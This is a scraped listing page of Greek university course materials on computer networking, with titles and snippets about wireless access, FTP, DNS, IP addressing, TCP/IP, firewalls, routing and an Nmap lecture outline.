Οδηγίες προς τον τελικό χρήστη για τη σύνδεση στο Ασύρματο Δίκτυο Δεδομένων του ΤΜΗΥ&Π Οδηγίες προς τον τελικό χρήστη για τη σύνδεση στο Ασύρματο Δίκτυο Δεδομένων του ΤΜΗΥ&Π Χρήστες του ασύρματου δικτύου δεδομένων του Τμήματος Μηχανικών Ηλεκτρονικών Υπολογιστών & Πληροφορικής μπορούν να

Διαβάστε περισσότερα

Βασικές Υπηρεσίες Διαδικτύου. Επικοινωνίες Δεδομένων Μάθημα 2 ο

Βασικές Υπηρεσίες Διαδικτύου. Επικοινωνίες Δεδομένων Μάθημα 2 ο Βασικές Υπηρεσίες Διαδικτύου Επικοινωνίες Δεδομένων Μάθημα 2 ο Μεταφορά αρχείων (File Transfer Protocol, FTP) user at host FTP user interface FTP client local file system file transfer FTP server remote

Διαβάστε περισσότερα

Εργαστήριο «Δίκτυα Υπολογιστών Ι»

Εργαστήριο «Δίκτυα Υπολογιστών Ι» Εργαστήριο «Δίκτυα Υπολογιστών Ι» Άσκηση 2 η Τμήμα Mηχ. Πληροφορικής & Υπολογιστών Παν. Δυτικής Αττικής Ημερομηνία έκδοσης: 3/10/2018 Επιμέλεια: Αντώνης Μπόγρης, Ιωάννης Ξυδάς Στόχοι της άσκησης: Μελέτη

Διαβάστε περισσότερα

Δίκτυα Υπολογιστών Ενότητα 3: Domain Name System - DNS

Δίκτυα Υπολογιστών Ενότητα 3: Domain Name System - DNS Δίκτυα Υπολογιστών Ενότητα 3: Domain Name System - DNS Μιχάλας Άγγελος Τμήμα Μηχανικών Πληροφορικής ΤΕ Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative Commons. Για εκπαιδευτικό

Διαβάστε περισσότερα

Επίπεδο δικτύου IP διευθυνσιοδότηση

Επίπεδο δικτύου IP διευθυνσιοδότηση Επίπεδο δικτύου IP διευθυνσιοδότηση (πες μου την IP σου να σου πω ποιος είσαι) Εργαστήριο Δικτύων Υπολογιστών 2014-2015 Τμήμα Μηχανικών Η/Υ και Πληροφορικής Επίπεδο δικτύου (Network layer) Επίπεδο εφαρμογής

Διαβάστε περισσότερα

Δημιουργία Λογαριασμού Διαχείρισης Business Telephony Create a Management Account for Business Telephony

Δημιουργία Λογαριασμού Διαχείρισης Business Telephony Create a Management Account for Business Telephony Δημιουργία Λογαριασμού Διαχείρισης Business Telephony Create a Management Account for Business Telephony Ελληνικά Ι English 1/7 Δημιουργία Λογαριασμού Διαχείρισης Επιχειρηματικής Τηλεφωνίας μέσω της ιστοσελίδας

Διαβάστε περισσότερα

Ιόνιο Πανεπιστήµιο Τµήµα Αρχειονοµίας Βιβλιοθηκονοµίας. Μοντέλο TCP/IP. Ενότητα E. Συστήµατα Επικοινωνίας

Ιόνιο Πανεπιστήµιο Τµήµα Αρχειονοµίας Βιβλιοθηκονοµίας. Μοντέλο TCP/IP. Ενότητα E. Συστήµατα Επικοινωνίας Ιόνιο Πανεπιστήµιο Τµήµα Αρχειονοµίας Βιβλιοθηκονοµίας ίκτυα Η/Υ Μοντέλο TCP/IP Ενότητα E ρ. Ε. Μάγκος Συστήµατα Επικοινωνίας (Ε) (PC) (N) Επικοινωνίες: Εφαρµογές Υπολογιστές ίκτυα πολλές πολλοί N A N

Διαβάστε περισσότερα

ΠΑΝΕΠΙΣΤΗΜΙΟΥ ΠΕΛΟΠΟΝΝΗΣΟΥ ΤΜΗΜΑ ΕΠΙΣΤΗΜΗΣ ΚΑΙ ΤΕΧΝΟΛΟΓΙΑΣ ΤΗΛΕΠΙΚΟΙΝΩΝΙΩΝ Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών

ΠΑΝΕΠΙΣΤΗΜΙΟΥ ΠΕΛΟΠΟΝΝΗΣΟΥ ΤΜΗΜΑ ΕΠΙΣΤΗΜΗΣ ΚΑΙ ΤΕΧΝΟΛΟΓΙΑΣ ΤΗΛΕΠΙΚΟΙΝΩΝΙΩΝ Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών ΠΑΝΕΠΙΣΤΗΜΙΟΥ ΠΕΛΟΠΟΝΝΗΣΟΥ ΤΜΗΜΑ ΕΠΙΣΤΗΜΗΣ ΚΑΙ ΤΕΧΝΟΛΟΓΙΑΣ ΤΗΛΕΠΙΚΟΙΝΩΝΙΩΝ Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών Διδάσκων: Απόστολος Γκάμας (Διδάσκων ΠΔ 407/80) Ενδεικτική Λύση 3 ης Εργαστηριακής

Διαβάστε περισσότερα

υποστηρίζουν και υλοποιούν την πολιτική ασφάλειας

υποστηρίζουν και υλοποιούν την πολιτική ασφάλειας Firewalls Firewalls Τα firewalls (τοίχοι πυρασφάλειας ή πυρότοιχοι ή αναχώματα ασφαλείας ή φράγματα ασφαλείας) είναι ένα σύστημα το οποίο παρεμβάλλεται μεταξύ του ιδιωτικού δικτύου και του δημοσίου δικτύου

Διαβάστε περισσότερα

Network Mapper. Nmap

Network Mapper. Nmap Network Mapper Nmap 3-1 Contents Introduction Target Specification Host Discovery Port Scanning Service and Version Detection OS Detection Examples Assignment 3-2 Contents Introduction Target Specification

Διαβάστε περισσότερα

Ρυθµ θ ίσ ί ε σ ις ς e-mai a l i dsp s ei e ra r i a a.gr g

Ρυθµ θ ίσ ί ε σ ις ς e-mai a l i dsp s ei e ra r i a a.gr g Ρυθµίσεις e-mail dspeiraia.gr Οδηγός Ρυθμίσεων E-mail Όνομα χρήστη Κωδικός Διακομιστής Εισερχόμενης Αλληλογραφίας mail.dspeiraia.gr Διακομιστής Εξερχόμενης Αλληλογραφίας mailgate.wexgroup.com E-mail_Setup_dspeiraia_V1.2_WL.docx141007_02

Διαβάστε περισσότερα

Εγκατάσταση λογισμικού και αναβάθμιση συσκευής Device software installation and software upgrade

Εγκατάσταση λογισμικού και αναβάθμιση συσκευής Device software installation and software upgrade Για να ελέγξετε το λογισμικό που έχει τώρα η συσκευή κάντε κλικ Menu > Options > Device > About Device Versions. Στο πιο κάτω παράδειγμα η συσκευή έχει έκδοση λογισμικού 6.0.0.546 με πλατφόρμα 6.6.0.207.

Διαβάστε περισσότερα

ΤΕΧΝΟΛΟΓΙΑ ΔΙΚΤΥΩΝ ΕΠΙΚΟΙΝΩΝΙΩΝ

ΤΕΧΝΟΛΟΓΙΑ ΔΙΚΤΥΩΝ ΕΠΙΚΟΙΝΩΝΙΩΝ Σε δίκτυο υπολογιστών εμπιστευτική πληροφορία μπορεί να υπάρχει αποθηκευμένη σε μέσα αποθήκευσης (σκληροί δίσκοι, μνήμες κ.λ.π.), ή να κυκλοφορεί μέσου του δικτύου με τη μορφή πακέτων. Η ύπαρξη πληροφοριών

Διαβάστε περισσότερα

Τεχνολογίες ιαδικτύου

Τεχνολογίες ιαδικτύου Τεχνολογίες ιαδικτύου Εισαγωγή Αρχιτεκτονική, Πρωτόκολλα και Πρότυπα Βασικών Υπηρεσιών Ιστορικά Στοιχεία ARPANET Ο «παππούς» των δικτύων Αναπτύχθηκε από την DARPA στα τέλη του 60 Το 83 διασπάται σε MILNET

Διαβάστε περισσότερα

Ιόνιο Πανεπιστήµιο Τµήµα Πληροφορικής Συστήµατα Επικοινωνίας. Μοντέλο TCP/IP. Ενότητα E. Πόσοι εµπλέκονται σε ένα Σύστηµα Επικοινωνίας

Ιόνιο Πανεπιστήµιο Τµήµα Πληροφορικής Συστήµατα Επικοινωνίας. Μοντέλο TCP/IP. Ενότητα E. Πόσοι εµπλέκονται σε ένα Σύστηµα Επικοινωνίας Ιόνιο Πανεπιστήµιο Τµήµα Πληροφορικής ίκτυα Η/Υ Συστήµατα Επικοινωνίας (Ε) (PC) (N) Επικοινωνίες: Εφαρµογές Υπολογιστές ίκτυα Μοντέλο TCP/IP πολλές πολλοί N A N B Ενότητα E PC A PC B PC D PC E E A E B

Διαβάστε περισσότερα

Εργαστηριακή Άσκηση 3 Εισαγωγή στη δρομολόγηση

Εργαστηριακή Άσκηση 3 Εισαγωγή στη δρομολόγηση Εργαστηριακή Άσκηση 3 Εισαγωγή στη δρομολόγηση Όπως είδαμε και στο τέλος του προηγούμενου εργαστηρίου, μια από τις βασικότερες λειτουργίες του Internet είναι δρομολόγηση πακέτων IP. Με τον γενικό όρο δρομολόγηση

Διαβάστε περισσότερα